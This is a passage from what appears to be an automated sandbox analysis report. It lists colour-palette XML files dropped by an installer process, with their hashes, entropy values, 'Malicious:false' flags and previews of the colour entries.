                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Greens" >. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000400" alpha="255" />. <Color colorName="#000c00" alpha="255" />. <Color colorName="#001000" alpha="255" />. <Color colorName="#001800" alpha="255" />. <Color colorName="#002000" alpha="255" />. <Color colorName="#002400" alpha="255" />. <Color colorName="#002c00" alpha="255" />. <Color colorName="#003000" alpha="255" />. <Color colorName="#003800" alpha="255" />. <Color colorName="#004000" alpha="255" />. <Color colorName="#004400" alpha="255" />. <Color colorName="#004c00" alpha="255" />. <Color colorName="#005000" alpha="255" />. <Color colorName="#005800" alpha="255" />. <Color colorName="#006000" alpha="255" />. <Color colorName="#006400" alpha="255" />. <Color colorName="#006c00" alpha="255" />. <Color colorName="#007400" alpha="255" />. <Color colorName="#007800" alpha="255" />. <Color colorNam
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Hilite.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11100
                                                                  Entropy (8bit):4.534046987862113
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8vfUU/0BcGGLn3aXqtgbH7t0JTJ7F5BBSOihj7XP6PWUfIzzB//q3r:9vPGGLKXogeFK7XiB3r
                                                                  MD5:B4D3F6AFE3D6B208E889C165358FDFCC
                                                                  SHA1:43A63F43BF3BD0D97A3ABFE0BF9D7930B5AFF6D6
                                                                  SHA-256:611A50A838237E67ED3C842B5B1F70D0634AFA44ED1F805B24CF455B137028DC
                                                                  SHA-512:9810808FAC6C565D3F9F9D2118B3AC41927B37FCCA73AB0392CDCBFF3A8BE9AAE59DC0F0DFDEFCDFB9CB41DE1D85D473FB25DE33DD7F66F245CE00879DFE4088
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Hilite" >. <Color colorName="#a490b4" alpha="255" />. <Color colorName="#a090b4" alpha="255" />. <Color colorName="#a090b4" alpha="255" />. <Color colorName="#a090b0" alpha="255" />. <Color colorName="#a090b0" alpha="255" />. <Color colorName="#a08cac" alpha="255" />. <Color colorName="#a08cac" alpha="255" />. <Color colorName="#a08ca8" alpha="255" />. <Color colorName="#a08ca8" alpha="255" />. <Color colorName="#a08ca8" alpha="255" />. <Color colorName="#a08ca4" alpha="255" />. <Color colorName="#a088a4" alpha="255" />. <Color colorName="#9c88a0" alpha="255" />. <Color colorName="#9c88a0" alpha="255" />. <Color colorName="#9c889c" alpha="255" />. <Color colorName="#9c889c" alpha="255" />. <Color colorName="#9c889c" alpha="255" />. <Color colorName="#9c8498" alpha="255" />. <Color colorName="#9c8498" alpha="255" />. <Color colorName="#9c8494" alpha="255" />. <Color colorName="#9c8494" alpha="255" />. <Color colorNam
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Khaki.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11099
                                                                  Entropy (8bit):4.513677329893502
                                                                  Encrypted:false
                                                                  SSDEEP:96:9oimmq++ZthhNiu37RQBBhhlew/gugug5lkXddgptttI:9Y7RQBBhhD//Sk40
                                                                  MD5:29A8B7BD0D763691535158B4E6901082
                                                                  SHA1:9411117C64A9E9226A6CF7C5CFC4AF47130C8BBB
                                                                  SHA-256:28CC002FBBDC1C9F642ACD5833006971129224474D281B215EBA84D8057F0E17
                                                                  SHA-512:504C2DFA593F4F883A60B6459CBA1073DB9DE6D99CBD8CD2E6F8FAB8316D17A1A38C3F5DB84ABE7B68612F665A5F92B7BD603F2FF6CEF2C189FBEA9BAE00FF16
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Khaki" >. <Color colorName="#90846c" alpha="255" />. <Color colorName="#908470" alpha="255" />. <Color colorName="#908470" alpha="255" />. <Color colorName="#908474" alpha="255" />. <Color colorName="#908874" alpha="255" />. <Color colorName="#908878" alpha="255" />. <Color colorName="#908878" alpha="255" />. <Color colorName="#908c78" alpha="255" />. <Color colorName="#908c7c" alpha="255" />. <Color colorName="#908c7c" alpha="255" />. <Color colorName="#908c80" alpha="255" />. <Color colorName="#909080" alpha="255" />. <Color colorName="#909084" alpha="255" />. <Color colorName="#909084" alpha="255" />. <Color colorName="#909088" alpha="255" />. <Color colorName="#909488" alpha="255" />. <Color colorName="#909488" alpha="255" />. <Color colorName="#90948c" alpha="255" />. <Color colorName="#90988c" alpha="255" />. <Color colorName="#909890" alpha="255" />. <Color colorName="#909890" alpha="255" />. <Color colorName
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Lights.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1167
                                                                  Entropy (8bit):4.563970618798404
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d8q9eNjqvjFw4qEYqNqmIEorFw9EHMJ+C5qUyqz9Eyc:c8qrW1
                                                                  MD5:408E80BCEE5CA28CF0975443D5C64FB3
                                                                  SHA1:63B98D8F1C05AA61E32C82F9918D9F878F620868
                                                                  SHA-256:4ABDC44792D22B4AD4127D0223CF4251B6CC3A7DB375E7C654DB6C1DBF6508A5
                                                                  SHA-512:83D3EB545C408F52B1C53CC164B0F73705D1E51166C2E17D6BEEEBA2216F5063390C0D40A36646327C6FFFB39A578F42A62D2E090A94931FED6C0760DF3926D1
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Lights" >. <Color colorName="#fffafa" alpha="255" />. <Color colorName="#f8f8ff" alpha="255" />. <Color colorName="#f5f5f5" alpha="255" />. <Color colorName="#dcdcdc" alpha="255" />. <Color colorName="#fffaf0" alpha="255" />. <Color colorName="#fdf5e6" alpha="255" />. <Color colorName="#faf0e6" alpha="255" />. <Color colorName="#faebd7" alpha="255" />. <Color colorName="#ffefd5" alpha="255" />. <Color colorName="#ffebcd" alpha="255" />. <Color colorName="#ffe4c4" alpha="255" />. <Color colorName="#ffdab9" alpha="255" />. <Color colorName="#ffdead" alpha="255" />. <Color colorName="#ffe4b5" alpha="255" />. <Color colorName="#fff8dc" alpha="255" />. <Color colorName="#fffff0" alpha="255" />. <Color colorName="#fffacd" alpha="255" />. <Color colorName="#fff5ee" alpha="255" />. <Color colorName="#f0fff0" alpha="255" />. <Color colorName="#f5fffa" alpha="255" />. <Color colorName="#f0ffff" alpha="255" />. <Color colorNam
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Muted.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):3445
                                                                  Entropy (8bit):4.585233717349798
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d82UASDj24TnsEq+nVtzsOtHe0CqtrKcnM3WqNuKFc4FIPcHlryZeCKxqoZAP0h:c8r3eu6ZLgmbo2P
                                                                  MD5:62FF50650F4445EFED8372C38FDB1A3D
                                                                  SHA1:BEC662C8C5D5CE9C8EE3040F7960443E74EC3F86
                                                                  SHA-256:8DA14B7FAA69DAEBE69EADFAD448CCE10E9FAAB5217059CDA4EE1E81345F78FB
                                                                  SHA-512:C64A3956631E67171A71EA96E2EA001C4137814EE7019C5AE6BB589E7241351E8D50480DBD987071DC9A956A3DBEEE9141F6991AC7E867A4126EE2CD9772DF5E
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Muted" >. <Color colorName="#8b8989" alpha="255" />. <Color colorName="#8b8682" alpha="255" />. <Color colorName="#8b8378" alpha="255" />. <Color colorName="#8b7d6b" alpha="255" />. <Color colorName="#8b7765" alpha="255" />. <Color colorName="#8b795e" alpha="255" />. <Color colorName="#8b8970" alpha="255" />. <Color colorName="#8b8878" alpha="255" />. <Color colorName="#8b8b83" alpha="255" />. <Color colorName="#838b83" alpha="255" />. <Color colorName="#8b8386" alpha="255" />. <Color colorName="#8b7d7b" alpha="255" />. <Color colorName="#838b8b" alpha="255" />. <Color colorName="#473c8b" alpha="255" />. <Color colorName="#27408b" alpha="255" />. <Color colorName="#00008b" alpha="255" />. <Color colorName="#104e8b" alpha="255" />. <Color colorName="#36648b" alpha="255" />. <Color colorName="#00688b" alpha="255" />. <Color colorName="#4a708b" alpha="255" />. <Color colorName="#607b8b" alpha="255" />. <Color colorName
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\NamedColors.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):19362
                                                                  Entropy (8bit):4.547790104932671
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8+ZWGPlIbNYbOiZHt77jV8BUlqUYVNY7Qfdm0sUR50jtesnSjAEGaaFac02LqKe:9+ZW6IbNMZHtx8apucU1snGAEG/0zCk/
                                                                  MD5:301C15EBC9B8696007D0464CE84DF930
                                                                  SHA1:2463698396FAB36DBABB8D6F295AAD4630568431
                                                                  SHA-256:1252689CD56CF5DD1BF892A5FA89582AE488E5C83F8AC3EF6B2B2462162799E7
                                                                  SHA-512:AE4A21BF7D204A879F5097209D63BFC8CC1B12065DA3A0416406A658CEDC73274906FE2861715F9721FE95E14F7738887331942707E56ACD6F0C2188EE74C214
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Named Colors" >. <Color colorName="#fffafa" alpha="255" />. <Color colorName="#f8f8ff" alpha="255" />. <Color colorName="#f5f5f5" alpha="255" />. <Color colorName="#dcdcdc" alpha="255" />. <Color colorName="#fffaf0" alpha="255" />. <Color colorName="#fdf5e6" alpha="255" />. <Color colorName="#faf0e6" alpha="255" />. <Color colorName="#faebd7" alpha="255" />. <Color colorName="#ffefd5" alpha="255" />. <Color colorName="#ffebcd" alpha="255" />. <Color colorName="#ffe4c4" alpha="255" />. <Color colorName="#ffdab9" alpha="255" />. <Color colorName="#ffdead" alpha="255" />. <Color colorName="#ffe4b5" alpha="255" />. <Color colorName="#fff8dc" alpha="255" />. <Color colorName="#fffff0" alpha="255" />. <Color colorName="#fffacd" alpha="255" />. <Color colorName="#fff5ee" alpha="255" />. <Color colorName="#f0fff0" alpha="255" />. <Color colorName="#f5fffa" alpha="255" />. <Color colorName="#f0ffff" alpha="255" />. <Color co
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\News3.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11099
                                                                  Entropy (8bit):4.525242770237429
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8R6ALzPEU4Hfqlxwmto4w42QJWKmmeGGZZEpppNNNDDkkLfa5CCm77XsgccO:9P/LPo4w42xGGZZBCCm77Xe
                                                                  MD5:C1BDBEE2E4B85CA754FBCE971CAA545C
                                                                  SHA1:454EA1B4AF7C2BF4CB91E72913DC1CD8786F8332
                                                                  SHA-256:DFB51545B6D7DA255CF43D873F91F112E12533C75F3A8571F9E49DB2B5F1A22B
                                                                  SHA-512:43D7113BF5AD8AEF5F223780D8FFE3A96C77C73EAC41AA2C1BD7FC160118BFA51049BF108768FCE85062B0038471D17CB9B5FFA1106F200C4AAF2596C5B1461E
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="News3" >. <Color colorName="#ece804" alpha="255" />. <Color colorName="#ece804" alpha="255" />. <Color colorName="#e8e804" alpha="255" />. <Color colorName="#e4e804" alpha="255" />. <Color colorName="#e4e804" alpha="255" />. <Color colorName="#e0e804" alpha="255" />. <Color colorName="#dce804" alpha="255" />. <Color colorName="#dce804" alpha="255" />. <Color colorName="#d8e804" alpha="255" />. <Color colorName="#d4e404" alpha="255" />. <Color colorName="#d4e404" alpha="255" />. <Color colorName="#d0e404" alpha="255" />. <Color colorName="#cce404" alpha="255" />. <Color colorName="#cce404" alpha="255" />. <Color colorName="#c8e404" alpha="255" />. <Color colorName="#c4e404" alpha="255" />. <Color colorName="#c4e404" alpha="255" />. <Color colorName="#c0e404" alpha="255" />. <Color colorName="#bce404" alpha="255" />. <Color colorName="#bce404" alpha="255" />. <Color colorName="#b8e404" alpha="255" />. <Color colorName
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Op2.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11097
                                                                  Entropy (8bit):4.51830491223736
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8nPbv9sGIsQWYkqvQxxNHDuTjtXkxx/iiiiwllEFv:95sGI1gxNHDaqxxX
                                                                  MD5:88B9A72327B3FA17D22F07E3B20E2F5E
                                                                  SHA1:5BB1B7AED17138A16B4525F443950692FD6B47E9
                                                                  SHA-256:64F8C11A78E39EE0C8120E1EFD11332CF0841039556DD34D4661892C4B15EBE3
                                                                  SHA-512:13AAAB9D21234886C29FD62060C37B80DCE1D6CBDC6C4A6AD19C5BFC3C53EC10A4A61D4C002B31B37A9BDBAF1AB9823123D3EB38967046E0AAE8667733B3124D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Op2" >. <Color colorName="#cc9064" alpha="255" />. <Color colorName="#cc9064" alpha="255" />. <Color colorName="#c89468" alpha="255" />. <Color colorName="#c8986c" alpha="255" />. <Color colorName="#c89870" alpha="255" />. <Color colorName="#c49c74" alpha="255" />. <Color colorName="#c4a078" alpha="255" />. <Color colorName="#c0a47c" alpha="255" />. <Color colorName="#acd4b4" alpha="255" />. <Color colorName="#c0a880" alpha="255" />. <Color colorName="#c0ac84" alpha="255" />. <Color colorName="#bcb088" alpha="255" />. <Color colorName="#bcb48c" alpha="255" />. <Color colorName="#b8b890" alpha="255" />. <Color colorName="#b8b894" alpha="255" />. <Color colorName="#b4bc98" alpha="255" />. <Color colorName="#b4c09c" alpha="255" />. <Color colorName="#b4c4a0" alpha="255" />. <Color colorName="#b0c8a4" alpha="255" />. <Color colorName="#b0cca8" alpha="255" />. <Color colorName="#acd0ac" alpha="255" />. <Color colorName="
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Paintjet.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):868
                                                                  Entropy (8bit):4.709999557100073
                                                                  Encrypted:false
                                                                  SSDEEP:12:TMHd84eIgeIge5QQPgezgeNge4QgeCageHhgexgeNiRphge5QQPgezgeNge4QgeP:2d84KKTrRjtd/1Vgq0TrRjtd/1Vgqq
                                                                  MD5:4D3A4FB8B3B34337F6661AFFBDBEEE94
                                                                  SHA1:ACB41D6DCE2C15CF71897E2ACDA69E8B7714FB3B
                                                                  SHA-256:74CD69E3DFDE536C35E84DC66CED40025F683061FCCC48914CEBC60F0859E9ED
                                                                  SHA-512:3527548504695E469ED25884EB23699E9F5C4FB70583137CBB9065C7455239C1CAFC616C84FBA46DC39FA343DB6D3B7B84F9734081289218366BD30C9D5F5216
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Paintjet" >. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#18140c" alpha="255" />. <Color colorName="#f4f0e8" alpha="255" />. <Color colorName="#c44448" alpha="255" />. <Color colorName="#30845c" alpha="255" />. <Color colorName="#f0e848" alpha="255" />. <Color colorName="#343074" alpha="255" />. <Color colorName="#bc306c" alpha="255" />. <Color colorName="#2874c4" alpha="255" />. <Color colorName="#18140c" alpha="255" />. <Color colorName="#f4f0e8" alpha="255" />. <Color colorName="#c44448" alpha="255" />. <Color colorName="#30845c" alpha="255" />. <Color colorName="#f0e848" alpha="255" />. <Color colorName="#343074" alpha="255" />. <Color colorName="#bc306c" alpha="255" />. <Color colorName="#2874c4" alpha="255" />.</Palette>.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Pastels.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):867
                                                                  Entropy (8bit):4.693271903927657
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d8dZIw+0aPqti0iSXBXWiq4S9nq4qDqVkq8:c8IH+0eZ
                                                                  MD5:812CCBB546D84A825BCD8A903F7E980F
                                                                  SHA1:38B8C6B6B7FA175E55ED32AD03A1FEA3449D2036
                                                                  SHA-256:7FCDF8AC5B6EA3899330DCF389602C60A83FBAF33AC3B9B370837DCFD74C7417
                                                                  SHA-512:74B7026FFB76DF82026799E054E963750904E1E6DFD6AAEF543B04E7C80C9A08C6C2913FABEF89E076EFE406AEB2E2E1926D63C2EB00115722997B09D3131297
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Pastels" >. <Color colorName="#e29191" alpha="255" />. <Color colorName="#99dd92" alpha="255" />. <Color colorName="#93d8b9" alpha="255" />. <Color colorName="#94c4d3" alpha="255" />. <Color colorName="#949ace" alpha="255" />. <Color colorName="#b394cc" alpha="255" />. <Color colorName="#cc96b1" alpha="255" />. <Color colorName="#cca499" alpha="255" />. <Color colorName="#dfe592" alpha="255" />. <Color colorName="#ffa560" alpha="255" />. <Color colorName="#6bff63" alpha="255" />. <Color colorName="#65ffcc" alpha="255" />. <Color colorName="#65c4ff" alpha="255" />. <Color colorName="#656bff" alpha="255" />. <Color colorName="#ad65ff" alpha="255" />. <Color colorName="#ff65f4" alpha="255" />. <Color colorName="#ff6584" alpha="255" />. <Color colorName="#ff6565" alpha="255" />.</Palette>.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Plasma.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11100
                                                                  Entropy (8bit):4.521556963759047
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8DeI2flNO3yyNz91Vq8KUW0nIXPmNxweKJnYmk:9Dyfq3yyN5nPKUWoNzWk
                                                                  MD5:727A77A194920C12112A37B86BF2016D
                                                                  SHA1:4EBC1EBF20292177CF1748CE06F3E1E7F1B4D313
                                                                  SHA-256:545E65456068FB051E3D665DE7B7966F29FB92B8DC580486D0080DBBABB4BFE1
                                                                  SHA-512:CB58307E2730FAF0E80AA686057A545F30EE7A51F22430990223D7E32BD5A628E09147963DB6904E49F54F9071E5C4CC10F9A8DA8DA3DBA8AC6A3A5FB6ABD0F9
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Plasma" >. <Color colorName="#f0f000" alpha="255" />. <Color colorName="#f0e000" alpha="255" />. <Color colorName="#f0d000" alpha="255" />. <Color colorName="#f0c000" alpha="255" />. <Color colorName="#f0b000" alpha="255" />. <Color colorName="#f0a000" alpha="255" />. <Color colorName="#f09000" alpha="255" />. <Color colorName="#f08000" alpha="255" />. <Color colorName="#f07000" alpha="255" />. <Color colorName="#f06000" alpha="255" />. <Color colorName="#f05000" alpha="255" />. <Color colorName="#f04000" alpha="255" />. <Color colorName="#f03000" alpha="255" />. <Color colorName="#f02000" alpha="255" />. <Color colorName="#f01000" alpha="255" />. <Color colorName="#f00000" alpha="255" />. <Color colorName="#e0e010" alpha="255" />. <Color colorName="#e0d410" alpha="255" />. <Color colorName="#e0c810" alpha="255" />. <Color colorName="#e0b810" alpha="255" />. <Color colorName="#e0ac0c" alpha="255" />. <Color colorNam
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Reds.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11098
                                                                  Entropy (8bit):4.499168530426374
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d8xKTTm66+YjNjNFJJpg9g9Eo9mmTHHbvvyOKKKOOOyyyffLLzfffrrettett2j:c8F12id+7qB588X1IMUAYtxqYSrzpFR3
                                                                  MD5:9B5531846D0388433E93946C9E82ABA2
                                                                  SHA1:8F96AEA64516500ACAF5334C3931E071939C7238
                                                                  SHA-256:DE61CCAE472FEA6182EF56B3E13716FAB0E1EF2B53AF65F71E3E76309F4038BC
                                                                  SHA-512:AF7E9151ECB1A82F3042D270782966C4CFAEE11F95836C149EECB078786AAEFB4C8FC7B8BBAA48649A60CFC1A2AECD21E09E75AC0A5873D17ED97B825E677D31
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Reds" >. <Color colorName="#000000" alpha="255" />. <Color colorName="#4c0000" alpha="255" />. <Color colorName="#4c0000" alpha="255" />. <Color colorName="#480000" alpha="255" />. <Color colorName="#440000" alpha="255" />. <Color colorName="#440000" alpha="255" />. <Color colorName="#400000" alpha="255" />. <Color colorName="#3c0000" alpha="255" />. <Color colorName="#380000" alpha="255" />. <Color colorName="#380000" alpha="255" />. <Color colorName="#340000" alpha="255" />. <Color colorName="#300000" alpha="255" />. <Color colorName="#300000" alpha="255" />. <Color colorName="#2c0000" alpha="255" />. <Color colorName="#280000" alpha="255" />. <Color colorName="#280000" alpha="255" />. <Color colorName="#240000" alpha="255" />. <Color colorName="#200000" alpha="255" />. <Color colorName="#1c0000" alpha="255" />. <Color colorName="#1c0000" alpha="255" />. <Color colorName="#180000" alpha="255" />. <Color colorName=
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\RedsAndPurples.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1392
                                                                  Entropy (8bit):4.6762539584639615
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d8YalGInuXj6sQT+qmldN4ij+q9l/qS3x3NVqdq3224qFt6b:c8YnI8BUlqUb
                                                                  MD5:CC4D6B5BC7601FBB0585C0B8FEC8330A
                                                                  SHA1:10C5BE7EF75CFD444FCCAE9B7D83AD3F9BACB5EB
                                                                  SHA-256:4B9AB374ABEE95D7E8A6E934848D9B450F6143338129871DA990F152541C88B4
                                                                  SHA-512:23C2E500F5857D5AB983E1473F9CBECF1AEE311F396D31EEC2D4D2AF503AC1874FEEADECD7AB93F9BCD3AA22B8ECFEC01D15AA427FA3712E24844C66612D95AA
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Reds And Purples" >. <Color colorName="#cd5c5c" alpha="255" />. <Color colorName="#b22222" alpha="255" />. <Color colorName="#a52a2a" alpha="255" />. <Color colorName="#e9967a" alpha="255" />. <Color colorName="#fa8072" alpha="255" />. <Color colorName="#ffa07a" alpha="255" />. <Color colorName="#ff7f50" alpha="255" />. <Color colorName="#f08080" alpha="255" />. <Color colorName="#ff6347" alpha="255" />. <Color colorName="#ff4500" alpha="255" />. <Color colorName="#ff0000" alpha="255" />. <Color colorName="#ff69b4" alpha="255" />. <Color colorName="#ff1493" alpha="255" />. <Color colorName="#ffc0cb" alpha="255" />. <Color colorName="#ffb6c1" alpha="255" />. <Color colorName="#db7093" alpha="255" />. <Color colorName="#b03060" alpha="255" />. <Color colorName="#c71585" alpha="255" />. <Color colorName="#d02090" alpha="255" />. <Color colorName="#ff00ff" alpha="255" />. <Color colorName="#ee82ee" alpha="255" />. <Colo
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Royal.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11099
                                                                  Entropy (8bit):4.5265983006249755
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8gbwlDXvaQQeF22AYYsedAEtEg8BcNU1NlEaQSUw+NshgrZlUgR5sllld:9gbwlDXvaQQ1YYsedxtV9Gg3US5sllld
                                                                  MD5:9C972C9AA55CBCDCF7CD2522ED4609E8
                                                                  SHA1:D2F7476D43F6F0CAF3799EBF3B958B2D243F5A31
                                                                  SHA-256:72B0E735D58DA4792F5C4750B720B656459C227ACCE37D009E434792A6BF4B2E
                                                                  SHA-512:C8535C6ED2F793F1114D67C19A0C8CA36D83F6EF4DDB4E87BC808E55B57F5FA76D292D518156A7A85606EAB516C1EB9E3909EDEE0F9938670CD26935EE1DE2B0
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Royal" >. <Color colorName="#000000" alpha="255" />. <Color colorName="#3c0050" alpha="255" />. <Color colorName="#3c0050" alpha="255" />. <Color colorName="#3c0054" alpha="255" />. <Color colorName="#400054" alpha="255" />. <Color colorName="#400054" alpha="255" />. <Color colorName="#400058" alpha="255" />. <Color colorName="#400058" alpha="255" />. <Color colorName="#440058" alpha="255" />. <Color colorName="#44005c" alpha="255" />. <Color colorName="#44005c" alpha="255" />. <Color colorName="#44005c" alpha="255" />. <Color colorName="#480060" alpha="255" />. <Color colorName="#480060" alpha="255" />. <Color colorName="#480060" alpha="255" />. <Color colorName="#480064" alpha="255" />. <Color colorName="#4c0064" alpha="255" />. <Color colorName="#4c0064" alpha="255" />. <Color colorName="#4c0068" alpha="255" />. <Color colorName="#4c0068" alpha="255" />. <Color colorName="#4c0068" alpha="255" />. <Color colorName
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\TangoIconThemePalette.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1314
                                                                  Entropy (8bit):4.6653491766348525
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d8NpYqb/0SiKUiqiqiNfqL+qho4IzstDqogIAzWqFIX++h+qqqG0+c:c8PhzXYFZ
                                                                  MD5:9009A9ECEE84A2F8EA78B8A194C87E51
                                                                  SHA1:3660EF6B1C73BB81C3E702D2B30962B7D994EF8C
                                                                  SHA-256:129094037FA5C000FD761FBD13B3F5E71B4A9E5AB7167D529D6C7DF06AD2ADF7
                                                                  SHA-512:D545702AB06DCDD4349F24382C3BB874BCA67816212F74A1444510472547E8B0A47AEAF999166257113330EFC004189905AF0A4523E7193FB26F9B81D0E1752F
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Tango Icon Theme Palette" >. <Color colorName="#fce94f" alpha="255" />. <Color colorName="#edd400" alpha="255" />. <Color colorName="#c4a000" alpha="255" />. <Color colorName="#8ae234" alpha="255" />. <Color colorName="#73d216" alpha="255" />. <Color colorName="#4e9a06" alpha="255" />. <Color colorName="#fcaf3e" alpha="255" />. <Color colorName="#f57900" alpha="255" />. <Color colorName="#ce5c00" alpha="255" />. <Color colorName="#729fcf" alpha="255" />. <Color colorName="#3465a4" alpha="255" />. <Color colorName="#204a87" alpha="255" />. <Color colorName="#ad7fa8" alpha="255" />. <Color colorName="#75507b" alpha="255" />. <Color colorName="#5c3566" alpha="255" />. <Color colorName="#e9b96e" alpha="255" />. <Color colorName="#c17d11" alpha="255" />. <Color colorName="#8f5902" alpha="255" />. <Color colorName="#ef2929" alpha="255" />. <Color colorName="#cc0000" alpha="255" />. <Color colorName="#a40000" alpha="255" /
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Topographic.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11277
                                                                  Entropy (8bit):4.529508096715168
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8R/IYzL1PFJUq9I3Nzm3nZBFGVWaYi3fkfZqyDYAXdk2asC:96qQNunZBFgt3P2ax
                                                                  MD5:C2EDBBD8E83F46D9D2168DD6B56FAA30
                                                                  SHA1:0D769874B50281475FEAE4F7DFA65DF1AE258E74
                                                                  SHA-256:9CC6FDD6B5D1D85E74697355268DD3AAB25A8AD5E9A89891C98F4A78D88A91BA
